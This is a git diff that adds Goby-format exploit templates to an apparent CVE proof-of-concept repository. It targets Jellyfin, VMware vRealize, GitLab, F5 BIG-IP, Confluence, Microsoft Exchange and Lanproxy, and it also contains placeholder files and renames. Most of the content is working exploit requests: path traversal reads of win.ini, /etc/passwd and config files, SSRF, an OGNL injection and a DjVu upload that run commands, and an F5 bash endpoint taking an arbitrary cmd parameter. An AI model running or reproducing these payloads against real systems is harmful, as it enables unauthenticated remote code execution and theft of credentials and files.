<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
<com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
</java.util.PriorityQueue>
</java.util.PriorityQueue>\n 2\n \n \n\n"
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ }
+ ],
+ "PostTime": "2021-05-21 22:24:07",
+ "GobyVersion": "1.8.275",
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "CVEIDs": null,
+ "CVSSScore": "0.0",
+ "AttackSurfaces": {
+ "Application": null,
+ "Support": null,
+ "Service": null,
+ "System": null,
+ "Hardware": null
+ },
+ "DisclosureDate": "2021-05-22"
+}`
+
+ ExpManager.AddExploit(NewExploit(
+ goutils.GetFileName(),
+ expJson,
+ nil,
+ nil,
+ ))
+}
\ No newline at end of file
diff --git a/2021/CVE-2021-40438/poc/goby/wait_to_be_added b/2021/CVE-2021-21350/poc/nuclei/wait_to_be_added
similarity index 100%
rename from 2021/CVE-2021-40438/poc/goby/wait_to_be_added
rename to 2021/CVE-2021-21350/poc/nuclei/wait_to_be_added
diff --git a/2021/CVE-2021-40539/poc/goby/wait_to_be_added b/2021/CVE-2021-21350/poc/oneliner/wait_to_be_added
similarity index 100%
rename from 2021/CVE-2021-40539/poc/goby/wait_to_be_added
rename to 2021/CVE-2021-21350/poc/oneliner/wait_to_be_added
diff --git a/2021/CVE-2021-41277/poc/goby/wait_to_be_added b/2021/CVE-2021-21350/poc/others/wait_to_be_added
similarity index 100%
rename from 2021/CVE-2021-41277/poc/goby/wait_to_be_added
rename to 2021/CVE-2021-21350/poc/others/wait_to_be_added
diff --git a/2021/CVE-2021-21350/poc/pocsuite2/wait_to_be_added b/2021/CVE-2021-21350/poc/pocsuite2/wait_to_be_added
new file mode 100644
index 000000000..08b178987
--- /dev/null
+++ b/2021/CVE-2021-21350/poc/pocsuite2/wait_to_be_added
@@ -0,0 +1 @@
+Please contibute to implement this poc / vultarget, thanks!
diff --git a/2021/CVE-2021-21350/poc/pocsuite3/wait_to_be_added b/2021/CVE-2021-21350/poc/pocsuite3/wait_to_be_added
new file mode 100644
index 000000000..08b178987
--- /dev/null
+++ b/2021/CVE-2021-21350/poc/pocsuite3/wait_to_be_added
@@ -0,0 +1 @@
+Please contibute to implement this poc / vultarget, thanks!
diff --git a/2021/CVE-2021-21350/poc/xray/wait_to_be_added b/2021/CVE-2021-21350/poc/xray/wait_to_be_added
new file mode 100644
index 000000000..08b178987
--- /dev/null
+++ b/2021/CVE-2021-21350/poc/xray/wait_to_be_added
@@ -0,0 +1 @@
+Please contibute to implement this poc / vultarget, thanks!
diff --git a/2021/CVE-2021-21402/poc/goby/Jellyfin_10.7.0_Unauthenticated_Abritrary_File_Read_CVE_2021_21402.json b/2021/CVE-2021-21402/poc/goby/Jellyfin_10.7.0_Unauthenticated_Abritrary_File_Read_CVE_2021_21402.json
new file mode 100644
index 000000000..bd7b941ad
--- /dev/null
+++ b/2021/CVE-2021-21402/poc/goby/Jellyfin_10.7.0_Unauthenticated_Abritrary_File_Read_CVE_2021_21402.json
@@ -0,0 +1,158 @@
+{
+ "Name": "Jellyfin 10.7.0 Unauthenticated Abritrary File Read CVE-2021-21402",
+ "Level": "2",
+ "Tags": [
+ "Disclosure of Sensitive Information"
+ ],
+ "GobyQuery": "(title='Jellyfin')",
+ "Description": "Jellyfin is a Free Software Media System. In Jellyfin before version 10.7.1, with certain endpoints, well crafted requests will allow arbitrary file read from a Jellyfin server's file system. This issue is more prevalent when Windows is used as the host OS. Servers that are exposed to the public Internet are potentially at risk. This is fixed in version 10.7.1. As a workaround, users may be able to restrict some access by enforcing strict security permissions on their filesystem, however, it is recommended to update as soon as possible.",
+ "Product": "Jellyfin",
+ "Homepage": "https://jellyfin.org/",
+ "Author": "PeiQi",
+ "Impact": "Attackers can read arbitrary files to obtain sensitive information of the server
",
+ "Recommandation": "undefined
",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "File",
+ "type": "select",
+ "value": "windows/win.ini",
+ "show": ""
+ }
+ ],
+ "ScanSteps": [
+ "OR",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/octet-stream"
+ },
+ "data_type": "text",
+ "data": ""
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "font",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "file",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "extension",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ },
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/octet-stream"
+ },
+ "data_type": "text",
+ "data": ""
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "font",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "extension",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "file",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "OR",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/octet-stream"
+ },
+ "data_type": "text",
+ "data": ""
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ },
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/octet-stream"
+ },
+ "data_type": "text",
+ "data": ""
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ }
+ ],
+ "PostTime": "2021-04-07 21:05:13",
+ "GobyVersion": "1.8.255"
+}
\ No newline at end of file
diff --git a/2021/CVE-2021-21402/poc/xray/CVE-2021-21402.yaml b/2021/CVE-2021-21402/poc/xray/CVE-2021-21402.yml
similarity index 100%
rename from 2021/CVE-2021-21402/poc/xray/CVE-2021-21402.yaml
rename to 2021/CVE-2021-21402/poc/xray/CVE-2021-21402.yml
diff --git a/2021/CVE-2021-21972/poc/xray/CVE-2021-21972.yaml b/2021/CVE-2021-21972/poc/xray/CVE-2021-21972.yml
similarity index 100%
rename from 2021/CVE-2021-21972/poc/xray/CVE-2021-21972.yaml
rename to 2021/CVE-2021-21972/poc/xray/CVE-2021-21972.yml
diff --git a/2021/CVE-2021-21975/poc/goby/VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json b/2021/CVE-2021-21975/poc/goby/VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json
new file mode 100644
index 000000000..ac7252343
--- /dev/null
+++ b/2021/CVE-2021-21975/poc/goby/VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json
@@ -0,0 +1,121 @@
+{
+ "Name": "VMWare Operations vRealize Operations Manager API SSRF CVE-2021-21975",
+ "Level": "2",
+ "Tags": [
+ "SSRF"
+ ],
+ "GobyQuery": "app=\"Apache-Web-Server\" && title==\"vRealize Operations Manager\"",
+ "Description": "malicious attackers who access the vrealize Operations Manager API through the network can perform server-side request forgery attack to steal management credentials.",
+ "Product": "VMWare Operations vRealize Operations",
+ "Homepage": "https://www.vmware.com/cn/products/vrealize-operations.html",
+ "Author": "PeiQi",
+ "Impact": " can perform server-side request forgery attack to steal management credentials.
",
+ "Recommandation": "undefined
",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/casa/nodes/thumbprints",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/json;charset=UTF-8"
+ },
+ "data_type": "text",
+ "data": "[\"127.0.0.1:443\"]"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "not contains",
+ "value": "error_message",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "thumbprint",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "address",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/casa/nodes/thumbprints",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/json;charset=UTF-8"
+ },
+ "data_type": "text",
+ "data": "[\"127.0.0.1:443\"]"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "not contains",
+ "value": "error_message",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "thumbprint",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "address",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ }
+ ],
+ "PostTime": "2021-04-07 23:45:28",
+ "GobyVersion": "1.8.255"
+}
\ No newline at end of file
diff --git a/2021/CVE-2021-21975/poc/xray/CVE-2021-21975.yaml b/2021/CVE-2021-21975/poc/xray/CVE-2021-21975.yml
similarity index 100%
rename from 2021/CVE-2021-21975/poc/xray/CVE-2021-21975.yaml
rename to 2021/CVE-2021-21975/poc/xray/CVE-2021-21975.yml
diff --git a/2021/CVE-2021-22205/poc/goby/CVE-2021-22205.json b/2021/CVE-2021-22205/poc/goby/CVE-2021-22205.json
new file mode 100644
index 000000000..5043efc1b
--- /dev/null
+++ b/2021/CVE-2021-22205/poc/goby/CVE-2021-22205.json
@@ -0,0 +1,138 @@
+{
+ "Name": "Gitlab RCE CVE-2021-22205",
+ "Level": "3",
+ "Tags": [
+ "rce"
+ ],
+ "GobyQuery": "(app=gitlab | title=\"gitlab\")",
+ "Description": "An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution",
+ "Product": "gitlab",
+ "Homepage": "https://about.gitlab.com/",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=CVE-2021-22205"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/users/sign_in",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$head",
+ "operation": "contains",
+ "value": "experimentation_subject_id",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "X-CSRF-Token|lastbody|regex|name=\\\"csrf-token\\\" content=\\\"([\\s\\S]+?)\\\" />",
+ "output|lastbody|text|"
+ ]
+ },
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/uploads/user",
+ "follow_redirect": false,
+ "header": {
+ "X-CSRF-Token": "{{{X-CSRF-Token}}}",
+ "Content-Type": "multipart/form-data; boundary=---------------------------99652559321225150602861519786",
+ "X-Requested-With": "XMLHttpRequest"
+ },
+ "data_type": "text",
+ "data": "-----------------------------99652559321225150602861519786\nContent-Disposition: form-data; name=\"file\"; filename=\"demo.jpg\"\nContent-Type: image/jpeg\n\nAT&TFORM\u0000\u0000\u0000tDJVUINFO\u0000\u0000\u0000\n\u0000\u0000\u0000\u0000\u0018\u0000,\u0001\u0016\u0001BGjp\u0000\u0000\u0000\u0000ANTa\u0000\u0000\u0000N(metadata\n\t(Copyright \"\\\n\" . qx{ping -c1 {{{check}}} } . \\\n\" b \") )\n\n-----------------------------99652559321225150602861519786--\n",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "422",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "Failed to process image",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/test.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "test",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-04 16:35:47",
+ "GobyVersion": "1.8.302"
+}
\ No newline at end of file
diff --git a/2021/CVE-2021-22214/poc/xray/CVE-2021-22214.yaml b/2021/CVE-2021-22214/poc/xray/CVE-2021-22214.yml
similarity index 100%
rename from 2021/CVE-2021-22214/poc/xray/CVE-2021-22214.yaml
rename to 2021/CVE-2021-22214/poc/xray/CVE-2021-22214.yml
diff --git a/2021/CVE-2021-22986/poc/goby/F5_BIG_IP_RCE_CVE_2021_22986_exp.json b/2021/CVE-2021-22986/poc/goby/F5_BIG_IP_RCE_CVE_2021_22986_exp.json
new file mode 100644
index 000000000..52c89cd18
--- /dev/null
+++ b/2021/CVE-2021-22986/poc/goby/F5_BIG_IP_RCE_CVE_2021_22986_exp.json
@@ -0,0 +1,85 @@
+{
+ "Name": "F5 BIG-IP代码执行漏洞(CVE-2021-22986)exp",
+ "Level": "3",
+ "Tags": [
+ "RCE"
+ ],
+ "GobyQuery": "product=\"F5-BIGIP\"",
+ "Description": "F5 BIG-IP/BIG-IQ iControl REST 未授权远程代码执行漏洞中,未经身份验证的攻击者可通过iControl REST接口,构造恶意请求,执行任意系统命令。",
+ "Product": "F5 Big-IP",
+ "Homepage": "",
+ "Author": "k3vi_07@icloud.com",
+ "Impact": "F5 BIG-IP/BIG-IQ iControl REST 未授权远程代码执行漏洞中,未经身份验证的攻击者可通过iControl REST接口,构造恶意请求,执行任意系统命令。
",
+ "Recommandation": "undefined
",
+ "References": [
+ "https://www.freebuf.com/vuls/268254.html"
+ ],
+ "HasExp": true,
+ "ExpParams":[
+ {
+ "name":"cmd",
+ "type":"input",
+ "value":"whoami",
+ "show":""
+ }
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/mgmt/tm/util/bash",
+ "follow_redirect": true,
+ "header": {
+ "Authorization": "Basic YWRtaW46QVNhc1M=",
+ "X-F5-Auth-Token": ""
+ },
+ "data_type": "text",
+ "data": "{\"command\":\"run\",\"utilCmdArgs\":\"-c 'echo tsxts|base64'\"}"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "dHN4dHMK",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/mgmt/tm/util/bash",
+ "follow_redirect": false,
+ "header": {
+ "Authorization": "Basic YWRtaW46QVNhc1M=",
+ "X-F5-Auth-Token": ""
+ },
+ "data_type": "text",
+ "data": "{\"command\":\"run\",\"utilCmdArgs\":\"-c {{{cmd}}}\"}"
+ },
+
+ "SetVariable": [
+ "output|lastbody|regex|commandResult\".\"(.*)\"}"
+ ]
+ }
+ ],
+ "PostTime": "2021-04-01 16:51:54",
+ "GobyVersion": "1.8.255"
+}
\ No newline at end of file
diff --git a/2021/CVE-2021-22986/poc/xray/CVE-2021-22986.yaml b/2021/CVE-2021-22986/poc/xray/CVE-2021-22986.yml
similarity index 100%
rename from 2021/CVE-2021-22986/poc/xray/CVE-2021-22986.yaml
rename to 2021/CVE-2021-22986/poc/xray/CVE-2021-22986.yml
diff --git a/2021/CVE-2021-25282/poc/xray/CVE-2021-25282.yaml b/2021/CVE-2021-25282/poc/xray/CVE-2021-25282.yml
similarity index 100%
rename from 2021/CVE-2021-25282/poc/xray/CVE-2021-25282.yaml
rename to 2021/CVE-2021-25282/poc/xray/CVE-2021-25282.yml
diff --git a/2021/CVE-2021-26084/poc/goby/CVE-2021-26084.json b/2021/CVE-2021-26084/poc/goby/CVE-2021-26084.json
new file mode 100644
index 000000000..6dc831799
--- /dev/null
+++ b/2021/CVE-2021-26084/poc/goby/CVE-2021-26084.json
@@ -0,0 +1,82 @@
+{
+ "Name": "Confluence RCE(CVE-2021-26084)",
+ "Level": "3",
+ "Tags": [
+ "RCE"
+ ],
+ "GobyQuery": "product=\"Confluence\"",
+ "Description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.",
+ "Product": "Atlassian Confluence",
+ "Homepage": "https://www.atlassian.com/zh/software/confluence",
+ "Author": "aetkrad",
+ "Impact": "allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance
",
+ "Recommandation": "",
+ "References": [
+ "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26084"
+ ],
+ "HasExp":true,
+ "ExpParams":[
+ {
+ "name":"cmd",
+ "type":"input",
+ "value":"whoami",
+ "show":""
+ }
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/pages/doenterpagevariables.action",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "queryString=\\u0027%2b#{\\u0022\\u0022[\\u0022class\\u0022].forName(\\u0022javax.script.ScriptEngineManager\\u0022).newInstance().getEngineByName(\\u0022js\\u0022).eval(\\u0022var isWin=java.lang.System.getProperty(\\u0027os.name\\u0027).toLowerCase().contains(\\u0027win\\u0027);var p=new java.lang.ProcessBuilder;if(isWin){p.command([\\u0027cmd.exe\\u0027,\\u0027/c\\u0027,\\u0027echo workwork\\u0027]);}else{p.command([\\u0027/bin/bash\\u0027,\\u0027-c\\u0027,\\u0027echo workwork\\u0027]);}p.redirectErrorStream(true);var pc=p.start();org.apache.commons.io.IOUtils.toString(pc.getInputStream())\\u0022)}%2b\\u0027"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "workwork",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps":[
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/pages/doenterpagevariables.action",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "queryString=\\u0027%2b#{\\u0022\\u0022[\\u0022class\\u0022].forName(\\u0022javax.script.ScriptEngineManager\\u0022).newInstance().getEngineByName(\\u0022js\\u0022).eval(\\u0022var isWin=java.lang.System.getProperty(\\u0027os.name\\u0027).toLowerCase().contains(\\u0027win\\u0027);var p=new java.lang.ProcessBuilder;if(isWin){p.command([\\u0027cmd.exe\\u0027,\\u0027/c\\u0027,\\u0027{{{cmd}}}\\u0027]);}else{p.command([\\u0027/bin/bash\\u0027,\\u0027-c\\u0027,\\u0027{{{cmd}}}\\u0027]);}p.redirectErrorStream(true);var pc=p.start();org.apache.commons.io.IOUtils.toString(pc.getInputStream())\\u0022)}%2b\\u0027"
+ },
+ "SetVariable": [
+ "output|lastbody|regex|value=\"{([\\s\\S]*)=null}\""
+ ]
+ }
+ ],
+ "PostTime": "2021-10-27 13:33:02",
+ "GobyVersion": "1.8.294"
+}
\ No newline at end of file
diff --git a/2021/CVE-2021-26084/poc/xray/CVE-2021-26084.yaml b/2021/CVE-2021-26084/poc/xray/CVE-2021-26084.yml
similarity index 100%
rename from 2021/CVE-2021-26084/poc/xray/CVE-2021-26084.yaml
rename to 2021/CVE-2021-26084/poc/xray/CVE-2021-26084.yml
diff --git a/2021/CVE-2021-26085/poc/xray/CVE-2021-26085.yaml b/2021/CVE-2021-26085/poc/xray/CVE-2021-26085.yml
similarity index 100%
rename from 2021/CVE-2021-26085/poc/xray/CVE-2021-26085.yaml
rename to 2021/CVE-2021-26085/poc/xray/CVE-2021-26085.yml
diff --git a/2021/CVE-2021-26855/poc/xray/CVE-2021-26855.yaml b/2021/CVE-2021-26855/poc/xray/CVE-2021-26855.yml
similarity index 100%
rename from 2021/CVE-2021-26855/poc/xray/CVE-2021-26855.yaml
rename to 2021/CVE-2021-26855/poc/xray/CVE-2021-26855.yml
diff --git "a/2021/CVE-2021-26885/poc/goby/Microsoft Exchange SSRF\346\274\217\346\264\236 CVE-2021-26885.json" "b/2021/CVE-2021-26885/poc/goby/Microsoft Exchange SSRF\346\274\217\346\264\236 CVE-2021-26885.json"
new file mode 100644
index 000000000..d796c6570
--- /dev/null
+++ "b/2021/CVE-2021-26885/poc/goby/Microsoft Exchange SSRF\346\274\217\346\264\236 CVE-2021-26885.json"
@@ -0,0 +1,82 @@
+{
+ "Name": "Microsoft Exchange SSRF漏洞 CVE-2021-26885",
+ "Level": "1",
+ "Tags": [
+ "SSRF"
+ ],
+ "GobyQuery": "(app=\"Microsoft-Exchange\" || title=\"Outlook\")",
+ "Description": "Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协作系统。2021年03月3日,微软官方发布了Microsoft Exchange安全更新,披露了多个高危严重漏洞,其中:在 CVE-2021-26855 Exchange SSRF漏洞中,攻击者可直接构造恶意请求,以Exchange server的身份发起任意HTTP请求,扫描内网,并且可获取Exchange用户信息。该漏洞利用无需身份认证",
+ "Product": "Exchange",
+ "Homepage": "microsoft.com",
+ "Author": "PeiQi",
+ "Impact": "🐏
",
+ "Recommandation": "undefined
",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "Dnslog",
+ "type": "input",
+ "value": "xxx.dnslog.cn",
+ "show": ""
+ }
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/ecp/PeiQi.js",
+ "follow_redirect": false,
+ "header": {
+ "Cookie": "X-BEResource=peiqi_wiki/api/endpoint#~1; X-AnonResource=true"
+ },
+ "data_type": "text",
+ "data": ""
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "500",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "NegotiateSecurityContext",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/owa/auth/PeiQi.js",
+ "follow_redirect": false,
+ "header": {
+ "Cookie": "X-AnonResource=true; X-AnonResource-Backend={{{Dnslog}}}/ecp/default.flt?~3; X-BEResource={{{Dnslog}}}/owa/auth/logon.aspx?~3;"
+ },
+ "data_type": "text",
+ "data": ""
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ }
+ ],
+ "PostTime": "2021-03-13 14:34:38",
+ "GobyVersion": "1.8.237"
+}
\ No newline at end of file
diff --git a/2021/CVE-2021-26885/poc/nuclei/wait_to_be_added b/2021/CVE-2021-26885/poc/nuclei/wait_to_be_added
new file mode 100644
index 000000000..08b178987
--- /dev/null
+++ b/2021/CVE-2021-26885/poc/nuclei/wait_to_be_added
@@ -0,0 +1 @@
+Please contibute to implement this poc / vultarget, thanks!
diff --git a/2021/CVE-2021-26885/poc/oneliner/wait_to_be_added b/2021/CVE-2021-26885/poc/oneliner/wait_to_be_added
new file mode 100644
index 000000000..08b178987
--- /dev/null
+++ b/2021/CVE-2021-26885/poc/oneliner/wait_to_be_added
@@ -0,0 +1 @@
+Please contibute to implement this poc / vultarget, thanks!
diff --git a/2021/CVE-2021-26885/poc/others/wait_to_be_added b/2021/CVE-2021-26885/poc/others/wait_to_be_added
new file mode 100644
index 000000000..08b178987
--- /dev/null
+++ b/2021/CVE-2021-26885/poc/others/wait_to_be_added
@@ -0,0 +1 @@
+Please contibute to implement this poc / vultarget, thanks!
diff --git a/2021/CVE-2021-26885/poc/pocsuite2/wait_to_be_added b/2021/CVE-2021-26885/poc/pocsuite2/wait_to_be_added
new file mode 100644
index 000000000..08b178987
--- /dev/null
+++ b/2021/CVE-2021-26885/poc/pocsuite2/wait_to_be_added
@@ -0,0 +1 @@
+Please contibute to implement this poc / vultarget, thanks!
diff --git a/2021/CVE-2021-26885/poc/pocsuite3/wait_to_be_added b/2021/CVE-2021-26885/poc/pocsuite3/wait_to_be_added
new file mode 100644
index 000000000..08b178987
--- /dev/null
+++ b/2021/CVE-2021-26885/poc/pocsuite3/wait_to_be_added
@@ -0,0 +1 @@
+Please contibute to implement this poc / vultarget, thanks!
diff --git a/2021/CVE-2021-26885/poc/xray/wait_to_be_added b/2021/CVE-2021-26885/poc/xray/wait_to_be_added
new file mode 100644
index 000000000..08b178987
--- /dev/null
+++ b/2021/CVE-2021-26885/poc/xray/wait_to_be_added
@@ -0,0 +1 @@
+Please contibute to implement this poc / vultarget, thanks!
diff --git a/2021/CVE-2021-28164/poc/xray/CVE-2021-28164.yaml b/2021/CVE-2021-28164/poc/xray/CVE-2021-28164.yml
similarity index 100%
rename from 2021/CVE-2021-28164/poc/xray/CVE-2021-28164.yaml
rename to 2021/CVE-2021-28164/poc/xray/CVE-2021-28164.yml
diff --git a/2021/CVE-2021-29622/poc/xray/CVE-2021-29622.yaml b/2021/CVE-2021-29622/poc/xray/CVE-2021-29622.yml
similarity index 100%
rename from 2021/CVE-2021-29622/poc/xray/CVE-2021-29622.yaml
rename to 2021/CVE-2021-29622/poc/xray/CVE-2021-29622.yml
diff --git a/2021/CVE-2021-3019/poc/goby/Lanproxy_Arbitrary_File_Read_CVE_2021_3019.json b/2021/CVE-2021-3019/poc/goby/Lanproxy_Arbitrary_File_Read_CVE_2021_3019.json
new file mode 100644
index 000000000..14c8b3315
--- /dev/null
+++ b/2021/CVE-2021-3019/poc/goby/Lanproxy_Arbitrary_File_Read_CVE_2021_3019.json
@@ -0,0 +1,85 @@
+{
+ "Name": "Lanproxy_Arbitrary_File_Read_CVE-2021-3019",
+ "Level": "2",
+ "Tags": [
+ "目录遍历"
+ ],
+ "GobyQuery": "header=\"Server: LPS-0.1\"",
+ "Description": "Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。",
+ "Product": "Lanproxy 0.1",
+ "Homepage": "https://github.com/ffay/lanproxy",
+ "Author": "PeiQi",
+ "Impact": "咩咩咩🐑
",
+ "Recommandation": "undefined
",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "Filename",
+ "type": "input",
+ "value": "/../conf/config.properties",
+ "show": ""
+ },
+ {
+ "name": "/etc/passwd",
+ "type": "textarea",
+ "value": "/../../../../../../../../../../etc/passwd",
+ "show": ""
+ }
+
+ ],
+ "ScanSteps": [
